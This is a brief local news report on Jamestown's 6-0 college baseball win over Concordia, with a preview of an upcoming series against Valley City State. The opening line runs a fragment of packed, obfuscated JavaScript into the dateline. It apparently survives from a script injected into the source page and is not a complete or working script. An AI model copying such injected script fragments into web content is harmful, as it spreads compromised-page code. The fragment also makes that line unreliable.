JAMESTOWN kekya|var|u0026u|referrer|edrdk||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – The Jimmie baseball team hasn’t seen many days below .500 in the days since Tom Hager took over as the head coach, but they were sitting below the benchmark into Tuesday’s game with Concordia. Jamestown came away with a 6-0 victory and hopefully won’t see the numbers below .500 for the rest of the season.
The Jimmies were gifted two runs in the first inning when Cobber starter Zack Nelson experience a bout of wildness. With two down and Jimmie lead-off man Kory Wolden aboard he preceded to walk three straight to put UJ ahead 2-0.
The game remained a 2-0 scored until the Jimmies added three tallies in the seventh inning with a Paul Sitkowski two-run bomb mixed in.
Jamestown will play Valley City State on Friday at 1pm and Saturday at 1pm in a four-game series. The Jimmies hold a 28-game winning streak over the Vikings that dates back to April 2008. The games can be heard on ESPN Jamestown and NewsDakota.com.
